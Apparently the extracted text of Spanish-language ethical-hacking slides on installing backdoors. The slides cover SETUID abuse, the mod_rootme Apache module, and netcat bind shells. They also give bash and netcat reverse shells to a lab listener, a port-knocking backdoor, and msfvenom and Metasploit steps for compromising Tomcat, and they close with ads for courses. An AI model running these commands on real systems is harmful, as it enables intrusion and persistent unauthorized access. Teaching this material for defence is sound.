View
125
Download
1
Category
Preview:
Citation preview
AGENDA 1. ¿Quién soy?
2. Buscando vulnerabilidades backdoors
3. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Información sobre el curso
6. Conclusiones
AGENDA 1. ¿Quién soy?
2. Buscando vulnerabilidades backdoors
3. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Información sobre el curso
6. Conclusiones
#whoami• Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH,
C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002
• Instructor Oficial de MILE2
• Consultor de Kunak Consulting SAC
http://www.kunak.com.pe
• Psicólogo que aun no comienza sus estudios….
• Escritor en mis tiempos libres:
http://www.el-palomo.com
• Correo electrónico:
• omarc320@gmail.com
• opalomino@kunak.com.pe
• Cuenta de Facebook:• www.facebook.com/El.Palomo.Seguridad.Informacion
AGENDA 1. ¿Quién soy?
2. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Información sobre el curso
5. Conclusiones
¿Qué es un Backdoor (puerta trasera)?
• Los backdoors son programas utilizadospor los hackers para lograr acceso asistemas operativos de manera rápida ysencilla.
• Existen diferentes tipos de backdoors:
• Backdoors en Aplicaciones Web
• Backdoors a través de SETUID
• Backdoors en Módulos de Servicios
• Backdoors del tipo Knocking
Arquitectura de los Ejemplos
TARGET
- Servidor TOMCAT vulnerable
- Aquí se instalaran los backdoors
- Sistema Operativo Linux
ATACANTE
- Computador desde el cual se
realizarán los ataques
- Sistema Operativo KALI LINUX 2
ATACANTE 2
- Computador desde el cual se
explotaran los backdoors
- Sistema Operativo Linux
Dirección IP: 192.168.4.131
Dirección IP: 192.168.4.130
Dirección IP: 192.168.4.132
Identificar Servicios TOMCAT
• Buscamos TOMCAT en la RED LAN através de NMAP
Nmap –sV –p 8080 –sS TARGET
auxiliary/scanner/portscan/syn
Buscamos TOMCAT/AXIS2 en INTERNET:
Google Dork:
intitle:"Tomcat Server Administration“
intitle:"Axis2 Happiness Page" +ext:jsp
Identificar Vulnerabilidades en TOMCAT• Vamos a utilizar METASPLOIT para identificar
vulnerabilidades:Root> msfconsole
Root> search tomcat
Root> use auxiliary/scanner/http/tomcat_mgr_login
Root> show options
Root> set RHOSTS 192.168.4.130
Finalmente realizar la carga de un .WAR malicioso paraobtener acceso al sistema operativo.
msfvenom -p java/meterpreter/reverse_tcpLHOST=192.168.4.131 -f war > meterpreter.war
En el cliente:
Msf> use exploit/multi/handler
Msf> set payload java/meterpreter/reverse_tcp
Backdoor con SETUID • De pronto algunos nunca escucharon de los
permisos GETUID, SETUID y STICKY. Pues estemecanismo de backdoor está asociado a SETUID.
¿Entonces en que consiste el SETUID?El SETUID es un bit que permite a las aplicacionesejecutarse con los permisos de su propietario. Elconcepto puede sonar muy abstracto pero si ponemosun ejemplo es más facil entender, vamos a crear unarchivo llamado TEST.C y lo compilamos.
Backdoor en Apache Server
• Cargamos un módulo en APACHE de talmanera que no se realicen cambios a nivel decódigo en los aplicativos PHP.
• ¿Cuántos administradores de Sistemasverifican los módulos cargados en Apache?
• Toca compilar un módulo de APACHE llamadoModROOTme.
https://github.com/jingchunzhang/backdoor_rootkit/tree/master/mod_rootme-0.4
Backdoor en Apache Server
• Comandos en el Sistema Operativo
root>cd mod_rootme-0.4/
root>Make Linux
root> cp mod_rootme2.so /etc/httpd/modules
root> /etc/init.d/httpd reload
En el cliente:
Root> nc 192.168.4.130 80
GET root
Backdoor: BindShell
• Las primeras herramientas utilizados porHackers fue la navaja suiza “NETCAT”.
• Una BindShell es un programacorriendo una SHELL dentro de unproceso de red.
• Una BindShell puede estar escrita encualquier lenguaje de programación.
http://netcat.sourceforge.net/download.php
Backdoor: Bind Shell
• Comandos en el sistema operativo:root>./configure --enable-DGAPING_SECURITY_HOLE
root>Make
root> cd src/
root> ./netcat -l -p 8443 -e /bin/sh
root> bg
En el CLIENTE:
C:\>nc64.exe 192.168.75.133 8443
Backdoor: Reverse Shell
• Tiene el mismo concepto que una
Bind Shell pero realizada de manera
reversa.
• Ahora es el servidor quien se
conecta a nuestro cliente. Esta
pensado para poder realizar
bypass de Firewalls.
Backdoor: Reverse Shell
• Reverse Shell con BASH
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:bash -i >& /dev/tcp/192.168.1.34/8080 0>&1
Backdoor: Reverse Shell
• Reverse Shell con NETCAT
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:./netcat -e /bin/sh 192.168.1.34 8080
Backdoor: KnockOut
• Knock viene del ingles tocar lapuerta.
• Este es un backdoor del tipo“Reverse Shell” que pasadesapercibido.
• Sólo puede ser accedido por aquelque conozca la combinación de la“puerta” correcta.
Backdoor: KnockOut
• En el servidor:• Root> $make servidor
• Root> ./knock-outd knock-out.conf eth5
• En el cliente (atacante):• Root> $make cliente
• Root> ./knock-outc 192.168.4.130 knock-out.conf
• Root> ./netcat -lv -p 64876
AGENDA 1. ¿Quién soy?
2. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Información sobre el curso
5. Conclusiones
Curso de Ethical Hacking
https://www.facebook.com/sistemasuni/
Lugar: Universidad Nacional de
Ingeniería (UNI) – Lima – Perú
Duración: 24 horas – Curso Básico
24 horas – Curso Avanzado
Certificado: A nombre de la Universidad
Nacional de Ingeniería (UNI)
Próximo Inicio: Inicios Recurrentes
Curso de Seguridad de Información
http://www.kunak.com.pe
Lugar: Miraflores – Lima – Perú
Duración: 60 horas
Certificado: A nombre Kunak
Consulting SAC
Próximo Inicio: Por definir
Recommended